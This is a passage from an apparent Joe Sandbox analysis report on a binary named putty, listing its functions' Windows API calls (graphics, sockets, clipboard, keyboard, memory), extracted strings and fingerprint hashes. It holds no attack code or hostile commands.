                            • ExtTextOutW.GDI32(?,00000003,?,00000001,?,00000000,?), ref: 0043EE0E
                            • SetBkMode.GDI32(?,00000001), ref: 0043EE24
                            • ExtTextOutW.GDI32(?,?,?,00000004,?,00000000,?), ref: 0043EE59
                            • ExtTextOutA.GDI32(?,00000003,?,00000001,?,00000000,?,?), ref: 0043EF01
                            • SetBkMode.GDI32(?,00000001), ref: 0043EF1F
                            • ExtTextOutA.GDI32(?,?,?,00000004,?,?,?), ref: 0043EF52
                            • SetBkMode.GDI32(?,00000001), ref: 0043F010
                            • ExtTextOutW.GDI32(?,00000002,?,00000004,?,?,?), ref: 0043F040
                            • SetBkMode.GDI32(?,00000001), ref: 0043F04B
                            • CreatePen.GDI32(00000000,00000000,?), ref: 0043F0A8
                            • SelectObject.GDI32(?,00000000), ref: 0043F0B9
                            • MoveToEx.GDI32(?,?,?,00000000), ref: 0043F0CA
                            • LineTo.GDI32(?,?,00000000), ref: 0043F0DA
                            • SelectObject.GDI32(?,?), ref: 0043F0E4
                            • DeleteObject.GDI32(00000000), ref: 0043F0E7
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: Text$Mode$Object$ByteSelect$AlignCharColorMultiWide$CreateDeleteLeadLineMove
                            • String ID: $ $@
                            • API String ID: 1635212989-2546599590
                            • Opcode ID: cd1a0294ed076e746248242b1afd7c9b67e3a8d0cfc10c3198c2fcd4b813f67e
                            • Instruction ID: fcd5226076300c76bdccf7a7b53959c2d364e10a73a60483dbf8312a0e74719b
                            • Opcode Fuzzy Hash: cd1a0294ed076e746248242b1afd7c9b67e3a8d0cfc10c3198c2fcd4b813f67e
                            • Instruction Fuzzy Hash: 7D62D171D0120ADFDF24DF59D844AEEBBB6FF48314F55502AE805A72A1C3399982CF98
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0043BA8E Relevance: 40.9, APIs: 22, Strings: 1, Instructions: 655windowregistryclipboardCOMMON
                            Download Yara Rule
                            APIs
                            • RegisterClipboardFormatA.USER32(commctrl_DragListMsg), ref: 0043BAA7
                            • SetMapMode.GDI32(?,00000001), ref: 0043BB2E
                            • _strlen.LIBCMT ref: 0043BB3B
                            • GetTextExtentPoint32A.GDI32(0000002B,?,00000000,?), ref: 0043BB48
                            • DrawEdge.USER32(0000002B,?,00000006,0000200F), ref: 0043BB5C
                            • _strlen.LIBCMT ref: 0043BB65
                            • TextOutA.GDI32(0000002B,?,?,?,00000000), ref: 0043BB96
                            • GetDC.USER32(00000000), ref: 0043BC6A
                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0043BC78
                            • MulDiv.KERNEL32(?,00000000), ref: 0043BC82
                            • ReleaseDC.USER32(00000000,00000111), ref: 0043BC92
                            • _strncpy.LIBCMT ref: 0043BCD9
                            • ChooseFontA.COMDLG32(?,?,?), ref: 0043BD12
                            • GetDlgItemTextA.USER32(00000000,?,?,00000104), ref: 0043BE5C
                            • SetDlgItemTextA.USER32(?,?,?), ref: 0043BEA2
                            • SetCapture.USER32(?,?,?), ref: 0043BFA1
                            • IsDlgButtonChecked.USER32(?,?), ref: 0043C095
                            • SendDlgItemMessageA.USER32(?,?,00000147,00000000,00000000), ref: 0043C151
                            • SendDlgItemMessageA.USER32(?,?,00000149,00000000,00000000), ref: 0043C169
                            • SendDlgItemMessageA.USER32(?,?,00000148,?,00000000), ref: 0043C18D
                            • SetDlgItemTextA.USER32(?,?,00000111), ref: 0043C19D
                            • ChooseColorA.COMDLG32(004749F8,?,?), ref: 0043C237
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: Item$Text$MessageSend$Choose_strlen$ButtonCapsCaptureCheckedClipboardColorDeviceDrawEdgeExtentFontFormatModePoint32RegisterRelease_strncpy
                            • String ID: commctrl_DragListMsg
                            • API String ID: 3050678439-3283919134
                            • Opcode ID: c1376d861db42fd75a3b72eb54fef33b38f965c8d08fa85fbcbb3880b49e12ff
                            • Instruction ID: a325c5f0360600cf968f32fdb505208d5f7018e00c26882bcd5c471407e08528
                            • Opcode Fuzzy Hash: c1376d861db42fd75a3b72eb54fef33b38f965c8d08fa85fbcbb3880b49e12ff
                            • Instruction Fuzzy Hash: 8C32C0356402099FEF24DF78CC89BEB3BE5FB08304F54552AFA4596292C778D881CB99
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00447834 Relevance: 31.7, APIs: 16, Strings: 2, Instructions: 244networkCOMMON
                            Download Yara Rule
                            APIs
                            • closesocket.WS2_32(?), ref: 0044784F
                            • socket.WS2_32(00000002,00000001,00000000), ref: 004478A4
                            • WSAGetLastError.WS2_32 ref: 004478B5
                            • setsockopt.WS2_32(00000000,0000FFFF,00000100,?,00000004), ref: 004478E0
                            • setsockopt.WS2_32(?,00000006,00000001,?,00000004), ref: 004478FB
                            • setsockopt.WS2_32(?,0000FFFF,00000008,?,00000004), ref: 00447916
                            • htons.WS2_32(?), ref: 00447959
                            • htonl.WS2_32(00000000), ref: 00447970
                            • htons.WS2_32(?), ref: 0044797A
                            • bind.WS2_32(?,00000002,?), ref: 0044798E
                            • WSAGetLastError.WS2_32 ref: 00447999
                            • htons.WS2_32(?), ref: 004479E1
                            • htonl.WS2_32(00000000), ref: 00447A57
                            • htons.WS2_32(?), ref: 00447A67
                            • connect.WS2_32(?,?,?), ref: 00447A96
                            • WSAGetLastError.WS2_32 ref: 00447AA1
                            Strings
                            • ..\windows\winnet.c, xrefs: 00447A33
                            • sock->addr->addresses && sock->step.curraddr < sock->addr->naddresses, xrefs: 00447A38
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: htons$ErrorLastsetsockopt$htonl$bindclosesocketconnectsocket
                            • String ID: ..\windows\winnet.c$sock->addr->addresses && sock->step.curraddr < sock->addr->naddresses
                            • API String ID: 787393233-2945477696
                            • Opcode ID: 9fe65324e70c465eddc718bd15c66d16e44d0bb2db8d6d4797a80e7316a8274f
                            • Instruction ID: 3341e483994d4776ef4eb118c4776083d6fa58ad43227f29a374a405655d0fba
                            • Opcode Fuzzy Hash: 9fe65324e70c465eddc718bd15c66d16e44d0bb2db8d6d4797a80e7316a8274f
                            • Instruction Fuzzy Hash: 5D91C375904204EFEF14DFA4DC89AAE7BB5FF44310F10406AF905AB2A1D7399D86CB98
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0044157E Relevance: 22.2, APIs: 9, Strings: 3, Instructions: 1228windowCOMMON
                            Download Yara Rule
                            APIs
                            • GetKeyboardLayout.USER32(00000000), ref: 004415DA
                            • GetKeyboardState.USER32(?), ref: 004415EA
                            • SetKeyboardState.USER32(?), ref: 00441678
                            • SendMessageA.USER32(00000115,00000001,00000000), ref: 004418AC
                            • SendMessageA.USER32(00000112,0000F100,00000000), ref: 00441967
                            • ToUnicodeEx.USER32(00000090,?,?,00475C84,00000003,00000000,?), ref: 0044210F
                            • ToAsciiEx.USER32(00000090,?,?,00474CB0,00000000,?), ref: 00442127
                            • MultiByteToWideChar.KERNEL32(00000000,00000000,00474CA0,00000000,00475C84,00000003), ref: 00442160
                            • MessageBeep.USER32(00000010), ref: 00442386
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: KeyboardMessage$SendState$AsciiBeepByteCharLayoutMultiUnicodeWide
                            • String ID: !$HL.FIG$MNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz@[\]^_`{
                            • API String ID: 2897891004-300343931
                            • Opcode ID: 27d73e3d702d9a115b97bbdbc4e975c23c6655d4ee1e6b5026d0bdc08e7830bb
                            • Instruction ID: 5d6b3412210c4c334c10d6b1b212689347c3b2fe7486aaa19bb9981c70aa288a
                            • Opcode Fuzzy Hash: 27d73e3d702d9a115b97bbdbc4e975c23c6655d4ee1e6b5026d0bdc08e7830bb
                            • Instruction Fuzzy Hash: 09924534944346DAFF308B648D85BBA7B60EB11304F68417BE945AA2F1D7BC8DC1D64E
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00448341 Relevance: 21.2, APIs: 14, Instructions: 192networkCOMMON
                            Download Yara Rule
                            APIs
                            • socket.WS2_32(?,00000001,00000000), ref: 004483BD
                            • setsockopt.WS2_32(00000000,0000FFFF,00000004,00000028,00000004), ref: 004483E5
                            • htons.WS2_32(00000000), ref: 0044841F
                            • inet_addr.WS2_32(00000028), ref: 00448441
                            • htonl.WS2_32(00000000), ref: 00448450
                            • htonl.WS2_32(00000000), ref: 00448477
                            • htons.WS2_32(00000000), ref: 00448483
                            • bind.WS2_32(00000000,00000002,-00000011), ref: 004484A3
                            • WSAGetLastError.WS2_32(?,0041730D,00000000), ref: 004484AE
                            • closesocket.WS2_32(00000000), ref: 004484BC
                            • listen.WS2_32(00000000,7FFFFFFF), ref: 004484CD
                            • closesocket.WS2_32(00000000), ref: 004484D9
                            • WSAGetLastError.WS2_32(?,0041730D,00000000,000000FF), ref: 004484DF
                            • closesocket.WS2_32(00000000), ref: 00448502
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: closesocket$ErrorLasthtonlhtons$bindinet_addrlistensetsockoptsocket
                            • String ID:
                            • API String ID: 1450300857-0
                            • Opcode ID: e3fa393f272722b80073e3e12a82d894a00d0f87b1effe1bca63d2dac4bfcfeb
                            • Instruction ID: 6c6c32b6e9c9e366d512557becd12a5c420c6d5e5fadaefa89a3948435047660
                            • Opcode Fuzzy Hash: e3fa393f272722b80073e3e12a82d894a00d0f87b1effe1bca63d2dac4bfcfeb
                            • Instruction Fuzzy Hash: 3B61C4B1800215EFDF119F68DC859AE7BB9FF04710F50816FF915EA295EB388980CB99
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 004486F8 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 125libraryloaderfileCOMMON
                            Download Yara Rule
                            APIs
                            • GetWindowsDirectoryA.KERNEL32(?,00000107,?,004744D8), ref: 00448710
                            • FindFirstFileA.KERNEL32(?,?,?,004744D8), ref: 00448737
                            • FindNextFileA.KERNEL32(00000000,?), ref: 0044875F
                            • FindClose.KERNEL32(00000000), ref: 0044876A
                            • GetCurrentProcessId.KERNEL32(?,004744D8), ref: 00448770
                            • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 004487AD
                            • GetProcAddress.KERNEL32(00000000,CryptGenRandom), ref: 004487CB
                            • GetProcAddress.KERNEL32(00000000,CryptReleaseContext), ref: 004487E9
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: AddressFindProc$File$CloseCurrentDirectoryFirstNextProcessWindows
                            • String ID: CryptAcquireContextA$CryptGenRandom$CryptReleaseContext$advapi32.dll
                            • API String ID: 2228959178-129414566
                            • Opcode ID: 74ddc8c1fecc973de86fee2575f10d40a10883520a12c04d4ec1d513933536e7
                            • Instruction ID: 3744fb77f819d778f2b961216f66e9ae5224397a93bc2e9dcc997c5b6324f5ac
                            • Opcode Fuzzy Hash: 74ddc8c1fecc973de86fee2575f10d40a10883520a12c04d4ec1d513933536e7
                            • Instruction Fuzzy Hash: 65415271908344AAEB11AB75EC89E9E77A8B744710F64057FF20CD2191EF38D9848F2C
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00450E96 Relevance: 16.0, APIs: 7, Strings: 2, Instructions: 200timeCOMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • _strlen.LIBCMT ref: 00450F05
                            • _strcat.LIBCMT ref: 00450F22
                            • _strncpy.LIBCMT ref: 00450F30
                            • _strncpy.LIBCMT ref: 00450FDA
                            • GetTimeZoneInformation.KERNEL32(004771C8,00000014,00000014,00408DF6,00000014,00000014,?,004510F7,0044D642,00457BC4,0000000B,?,0044DBCD,?,0043D0FD,00000000), ref: 0045100A
                            • WideCharToMultiByte.KERNEL32(00000000,00000000,004771CC,000000FF,0000003F,00000000,0043D0FD,?,004510F7,0044D642,00457BC4,0000000B,?,0044DBCD,?,0043D0FD), ref: 00451096
                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00477220,000000FF,0000003F,00000000,0043D0FD,?,004510F7,0044D642,00457BC4,0000000B,?,0044DBCD,?,0043D0FD), ref: 004510C8
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: ByteCharMultiWide_strncpy$InformationTimeZone_strcat_strlen
                            • String ID: 0<G$p<G
                            • API String ID: 2060319238-1284424790
                            • Opcode ID: ec861debd5a2c793a05b2d7c3474a6a9a7c664b5552b9db06a8107eecf769ccc
                            • Instruction ID: fa65c10d195800a2bb9ff7c1aaa14f6f66fa04bc392ef3923f0b3ad9e349813e
                            • Opcode Fuzzy Hash: ec861debd5a2c793a05b2d7c3474a6a9a7c664b5552b9db06a8107eecf769ccc
                            • Instruction Fuzzy Hash: 4C614872404290AFE721CF259D819267BA8FB01312754017FE848D72B3DB784ECADB5D
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00435355 Relevance: 15.4, APIs: 5, Strings: 3, Instructions: 1361COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID:
                            • String ID: $@$gvE
                            • API String ID: 0-2332325672
                            • Opcode ID: e02b2e8b590c79bc9b64bba3ffddabde671a9d734afc96b1e1c1685ae40563ec
                            • Instruction ID: 8c12aa0fbdc09fe74b6a71224cccc7f4bd71076c3ca8cc0daf925b9355c6cdc3
                            • Opcode Fuzzy Hash: e02b2e8b590c79bc9b64bba3ffddabde671a9d734afc96b1e1c1685ae40563ec
                            • Instruction Fuzzy Hash: 18B2F331604A06ABDF259E64C8C57A637A1BF0D304F29A0BBEC45CE29AD77CDC41CB59
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0043F872 Relevance: 15.1, APIs: 10, Instructions: 59clipboardwindowmemoryCOMMON
                            Download Yara Rule
                            APIs
                            • GlobalAlloc.KERNEL32(00002002,?,00000000,?,00000000,0043C4AF,00000000,00000000,?,00000001), ref: 0043F882
                            • GlobalLock.KERNEL32(00000000,000003E9,?,00000000,0043C4AF,00000000,00000000,?,00000001), ref: 0043F896
                            • GlobalUnlock.KERNEL32(00000000), ref: 0043F8B4
                            • SendMessageA.USER32(00008002,00000001,00000000), ref: 0043F8D5
                            • OpenClipboard.USER32 ref: 0043F8DD
                            • EmptyClipboard.USER32 ref: 0043F8E7
                            • SetClipboardData.USER32(00000001,00000000), ref: 0043F8F0
                            • CloseClipboard.USER32 ref: 0043F8F6
                            • GlobalFree.KERNEL32(00000000), ref: 0043F8FF
                            • SendMessageA.USER32(00008002,00000000,00000000), ref: 0043F914
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: ClipboardGlobal$MessageSend$AllocCloseDataEmptyFreeLockOpenUnlock
                            • String ID:
                            • API String ID: 1228832834-0
                            • Opcode ID: 3bfec59b50e83a7944db25860687c562f2dda46f7e2aaa7fd508b8c1243ddbde
                            • Instruction ID: ba892d88f1dd8a87cb05bb373ab5e1d76ca95c2fa7a33c581d212d91454e4f63
                            • Opcode Fuzzy Hash: 3bfec59b50e83a7944db25860687c562f2dda46f7e2aaa7fd508b8c1243ddbde
                            • Instruction Fuzzy Hash: 5C113071909316BFD7202F61BC48E2B7F6DEF49356F040079F94592132D7399C48CA69
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0043423E Relevance: 10.0, APIs: 2, Strings: 3, Instructions: 1294COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: CountTick
                            • String ID: ..\terminal.c$@$x > 0
                            • API String ID: 536389180-1092019167
                            • Opcode ID: 5014f5d673744616f24ecce89310486fb780dbff6e2148fe78b231da2bd780e1
                            • Instruction ID: a6f37c5e7e3cfc75f0ab7c5c6af324179d6ad7854516f91427e95bbade365495
                            • Opcode Fuzzy Hash: 5014f5d673744616f24ecce89310486fb780dbff6e2148fe78b231da2bd780e1
                            • Instruction Fuzzy Hash: B5A2D3305006419BDF28AE24C8857E637A1FF9D304F2861BBED568E297D77CA881CB59
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0044F125 Relevance: 9.1, APIs: 6, Instructions: 76COMMON
                            Download Yara Rule
                            APIs
                            • GetVersionExA.KERNEL32(?,00470420,00000060), ref: 0044F145
                            • GetModuleHandleA.KERNEL32(00000000,?,00470420,00000060), ref: 0044F198
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: HandleModuleVersion
                            • String ID:
                            • API String ID: 3651626284-0
                            • Opcode ID: e81ed661582ea169cb5219fb535b1267bfdef511a8b45d8bdf5f75cf2ba8aa19
                            • Instruction ID: 393ef14354683b73db286a3f3db13eb5f110189a63a210ca0f0c1b3f5791f5db
                            • Opcode Fuzzy Hash: e81ed661582ea169cb5219fb535b1267bfdef511a8b45d8bdf5f75cf2ba8aa19
                            • Instruction Fuzzy Hash: 0D219CB1D047208BEB21AFA6EC0565E7BA4FF45306B50047FF808A7322D7789946CB9D
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00446525 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 75windowCOMMON
                            Download Yara Rule
                            APIs
                            • FormatMessageA.KERNEL32(00001200,00000000,?,00000400,00000000,0000FFFF,00000000,?,?,?,7556E010,0044081D,00449E36,00000000), ref: 00446595
                            • GetLastError.KERNEL32(?,?,7556E010,0044081D,00449E36,00000000), ref: 004465A0
                            • _strlen.LIBCMT ref: 004465C0
                            • _strlen.LIBCMT ref: 004465DE
                            Strings
                            • Windows error code %d (and FormatMessage returned %d), xrefs: 004465AB
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: _strlen$ErrorFormatLastMessage
                            • String ID: Windows error code %d (and FormatMessage returned %d)
                            • API String ID: 63550713-3310111201
                            • Opcode ID: 68d8155354ea594900905a63553f2a2c5c520a76aae7e0025536ed256ec0cf91
                            • Instruction ID: d0f0a069aac5f51432b7eb2b2fa1fd8f6c635a0b28679f1cc0315203cd42be50
                            • Opcode Fuzzy Hash: 68d8155354ea594900905a63553f2a2c5c520a76aae7e0025536ed256ec0cf91
                            • Instruction Fuzzy Hash: C12104B0A44300BFF7315B61AC02F277BD8DF01B14F11442EF589961D2EB799800875E
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0045114E Relevance: 7.6, APIs: 5, Instructions: 92memoryCOMMON
                            Download Yara Rule
                            APIs
                            • VirtualQuery.KERNEL32(?,?,0000001C), ref: 00451168
                            • GetSystemInfo.KERNEL32(?,?,?,0000001C), ref: 00451179
                            • VirtualQuery.KERNEL32(?,?,0000001C,?,?,0000001C), ref: 004511BF
                            • VirtualAlloc.KERNEL32(?,?,00001000,00000004,?,?,0000001C), ref: 004511FD
                            • VirtualProtect.KERNEL32(?,?,00000002,?,?,?,0000001C), ref: 00451223
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: Virtual$Query$AllocInfoProtectSystem
                            • String ID:
                            • API String ID: 4136887677-0
                            • Opcode ID: adf9129c82db4715b64c1a383a51b80f52bd6a301ab6abf922e7c8d3d0fe80ad
                            • Instruction ID: cc3db2dffd67338f958d737961886c439312cb579bc19fc2073c058f49ace2ba
                            • Opcode Fuzzy Hash: adf9129c82db4715b64c1a383a51b80f52bd6a301ab6abf922e7c8d3d0fe80ad
                            • Instruction Fuzzy Hash: C9319132D0061DEBDF10CBE4DD45AED7BB8EB08356F1406A6EE01E3251D6349A44DB94
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00440064 Relevance: 7.5, APIs: 5, Instructions: 26clipboardwindowCOMMON
                            Download Yara Rule
                            APIs
                            • OpenClipboard.USER32(00000000), ref: 00440066
                            • GetClipboardData.USER32(0000000D), ref: 00440079
                            • GetClipboardData.USER32(00000001), ref: 00440086
                            • SendMessageA.USER32(?,00008006,00000000,00000000), ref: 00440098
                            • CloseClipboard.USER32 ref: 0044009E
                            Memory Dump Source
